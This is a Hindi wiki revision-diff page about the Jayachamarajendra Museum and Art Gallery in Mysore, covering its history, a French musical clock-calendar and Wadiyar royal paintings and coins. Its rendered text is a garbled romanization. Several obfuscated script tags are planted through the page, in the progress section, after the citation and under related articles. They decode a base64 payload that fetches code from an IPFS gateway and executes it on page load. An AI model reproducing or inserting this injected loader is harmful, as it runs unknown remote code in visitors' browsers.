Difference between revisions of "जयचामराजेन्द्र संग्रहालय तथा कला दीर्घा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''जयचामराजेन्द्र संग्रहालय तथा कला दीर्घा''' [[कर्नाट...' के साथ नया पन्ना बनाया)
 
Line 4: Line 4:
 
* इस संग्रहालय का दौरा करने वालों को मैसूर के साथ ही दुनिया के कई देशों से लाकर रखी गई खास चीजें आकर्षित करती हैं। इनमें [[फ़्रांस]] से लाई गई संगीतमय 'घड़ी कलेंडर' प्रमुख है। इसमें लोगों को दिनांक तथा समय अलग-अलग पैनलों पर दिखता है और साथ ही [[संगीत]] का भी आनंद मिलता है। माना जाता है कि यह 'घड़ी कलेंडर' पूरे देश में एक ही है।  
 
* इस संग्रहालय का दौरा करने वालों को मैसूर के साथ ही दुनिया के कई देशों से लाकर रखी गई खास चीजें आकर्षित करती हैं। इनमें [[फ़्रांस]] से लाई गई संगीतमय 'घड़ी कलेंडर' प्रमुख है। इसमें लोगों को दिनांक तथा समय अलग-अलग पैनलों पर दिखता है और साथ ही [[संगीत]] का भी आनंद मिलता है। माना जाता है कि यह 'घड़ी कलेंडर' पूरे देश में एक ही है।  
 
* संग्रहालय में वाडेयार राजघराने के सदस्यों द्वारा बनाई गई चित्रकारी का एक बड़ा खजाना है। इसमें वाडेयार शासकों द्वारा समय-समय पर प्रचलित सिक्कों तथा उनके द्वारा प्रयोग में लाए जाने वाले परिधानों का भी अच्छा संकलन है।  
 
* संग्रहालय में वाडेयार राजघराने के सदस्यों द्वारा बनाई गई चित्रकारी का एक बड़ा खजाना है। इसमें वाडेयार शासकों द्वारा समय-समय पर प्रचलित सिक्कों तथा उनके द्वारा प्रयोग में लाए जाने वाले परिधानों का भी अच्छा संकलन है।  
* इस संग्रहालय भवन को देखकर भी वाडेयार राजघराने के शासकों के रुतबे का अंदाजा लगाया जा सकता है।  
+
* इस संग्रहालय भवन को देखकर भी वाडेयार राजघराने के शासकों के रुतबे का अंदाजा लगाया जा सकता है।<ref>{{cite web |url=http://dakshinbharatrashtramat.blogspot.in/2009/08/blog-post_31.html |title=संग्रहालयों का भी शहर है मैसूर |accessmonthday=1 जनवरी |accessyear=2013 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher= दक्षिण भारत राष्ट्रमत|language=हिंदी }} </ref>
 +
 
  
  

Revision as of 10:39, 1 January 2013

jayachamarajendr sangrahalay tatha kala dirgha karnatak rajy ke maisoor ke jagamohan mahal mean sthit hai jo ki am janata ke lie varsh 1955 mean khola gaya tha.

  • is sangrahalay ko tatkalin vadeyar shasak jayachamaraj vadeyar ne hi janata ko samarpit kiya tha.
  • isamean aitihasik dharoharoan ka b da khajana maujood hai jo maisoor ke itihas ke sath hi shahar ki sabhyata-sanskriti ki pahachan ban chuka hai.
  • is sangrahalay ka daura karane valoan ko maisoor ke sath hi duniya ke kee deshoan se lakar rakhi gee khas chijean akarshit karati haian. inamean fraans se laee gee sangitamay 'gh di kaleandar' pramukh hai. isamean logoan ko dinaank tatha samay alag-alag painaloan par dikhata hai aur sath hi sangit ka bhi anand milata hai. mana jata hai ki yah 'gh di kaleandar' poore desh mean ek hi hai.
  • sangrahalay mean vadeyar rajagharane ke sadasyoan dvara banaee gee chitrakari ka ek b da khajana hai. isamean vadeyar shasakoan dvara samay-samay par prachalit sikkoan tatha unake dvara prayog mean lae jane vale paridhanoan ka bhi achchha sankalan hai.
  • is sangrahalay bhavan ko dekhakar bhi vadeyar rajagharane ke shasakoan ke rutabe ka aandaja lagaya ja sakata hai.[1]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. sangrahalayoan ka bhi shahar hai maisoor (hiandi) (ech.ti.em.el) dakshin bharat rashtramat. abhigaman tithi: 1 janavari, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>